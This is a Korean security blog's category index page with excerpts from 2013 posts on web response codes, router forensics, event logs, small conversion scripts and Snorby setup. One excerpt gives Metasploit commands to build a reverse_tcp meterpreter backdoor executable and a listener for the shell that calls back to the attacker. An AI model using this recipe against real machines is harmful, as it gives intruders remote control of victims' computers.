목록IT/Security (221)

선 밖에 선 자유인

웹 애플리케이션 주요 응답 코드 가이드

- 302 Found : 어떤 페이지에서 로그인 페이지로 자동 redirect 한다면 인증된 사용자들에 의해서만 접근 가능할 확률 높음다른 페이지로 redirect 되는 경우 애플리케이션 로직에 대해 추가 조사 필요 - 400 Bad Request :애플리케이션에저 지정해 둔 디렉터리나 파일명을 URL 내에서 쓰는 원칙 등을 요청 값에서 맞추어 주지 못한 경우일 수 있음.Brute Force 공격에 사용된 단어 목록에 숨은 문자가 있거나 문제가 있는 경우 - 401 Unauthorized or 403 Forbidden : 요청된 리소스가 존재하나 인증 여부나 권한 여부에 관계없이 어떤 사용자에 의해서는 접근 불가를 가리킨다.해당 디렉토리가 존재하는 것으로 추측 가능 - 500 internal Server..
IT/Security 2013. 9. 13. 13:52
라우터 포렌식 - 정보수집

- 휘발성 정보 수집router# show clockrouter# show versionrouter# show usersrouter# show access-listsrouter# show ip routerouter# show arprouter# show stacks (crash 의 원인을 찾아낸다.) * 시스테 IOS 11.2 부터는 show tech-support 명령어를 통해 한꺼번에 보여준다. 아래의 내용들이 포함됨router# show versionrouter# show running-configrouter# show stacksrouter# show interfacerouter# show controllerrouter# show process cpurouter# show process memor..
IT/Security 2013. 9. 5. 15:49
Metasploit meterpreter를 이용한 침투

- 리소스 파일 생성 (attacker_.rc)use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST set ExitSession falseexploit -j -z - reverse_tcp 백도어 생성msfpayload windows/meterpreter/reverse_tcp LHOST= X > reverse_tcp.exe - 공격자 pc에서 리소스 실행msfconsole -r attacker_.rc - 사용자가 백도어를 실행하게 되면 reverse_tcp connection 연결 - 공격자는 sessions -i 를 통해 meterpreter 조작 가능
IT/Security 2013. 8. 23. 17:19
윈도 XP, 2003 에서 이벤트 로그 CMD 작업

윈도 7, 2008 이상에서는 wevtutil 을 이용하여 검색이 되지만 이전 버전에서는 지원되지 않음이벤트 로그 검색 스크립트인 eventquery.vbs 를 사용한다. 아래와 같이 cscript 를 이용하여 경로를 지정해 주어야 한다.CSCRIPT C:\WINDOWS\System32\EVENTQUERY.vbs EVENTQUERY.vbs [/S system [/U username [/P password]]] [/FI filter] [/FO format] [/R range] [/NH] [/V] [/L logname | *]설명: EventQuery.vbs 스크립트는 관리자가 하나 이상의 이벤트 로그의 이벤트 및 이벤트 속성을 나열할 수 있도록 합니다.매개 변수 목록: /S system 연결할 원격 시스템..
IT/Security 2013. 8. 22. 15:16
Hex Ascii Converter

Hex To ASCII Converter Hex: 41:6e:74:6f:6e:20:69:73:20:67:72:65:61:74:20:3a:29 Ascii:
IT/Security 2013. 8. 21. 09:54
10 digit decimal <-> ip Address 파이썬 스크립트

# 10digit decimal -> ip address #convert 10digit decimal formated ipaddress to normal ipaddress #by init6 #blog.init6.me import sys def main(): #read file and convert each line to ip address. Comment out to ask for input. with open('d:\ipaddress.txt', 'r') as infile: for line in infile: print (convert(int(line))) infile.close() #ask for input (dec format) Uncomment to ask for input. #decIn = inp..
IT/Security 2013. 8. 13. 16:07
안드로이드 분석 환경 framework

Honeynet https://redmine.honeynet.org/projects/are/wiki
IT/Security 2013. 8. 12. 14:51
snorby 패스워드 reset 방법

snorby에서 초기 로그인 패스워드는 메일로 받을 수 있으나 정상적으로 받지 못하는 경우가 많음.최초 snorby 로그인 패스워드를 지정하기 위해서 다음과 같이 변경.(rails 실행 시 java 가 설치되어 있어야 한다.)# apt-get install openjdk-7-jre# cd /opt/snorby[/opt/snorby]# sudo -u www-data RAILS_ENV="production" bundle exec script/rails c u = User.find_by_email("")u.password=""u.password_confirmation=""u.save ** mysql root 패스워드가 지정되어 있는 경우 오류 - snorby 의 WEB에서 보이는 UTC 시간대를 KST로 변경..
IT/Security 2013. 8. 7. 14:19
Prev 1 ··· 20 21 22 23 24 25 26 ··· 28 Next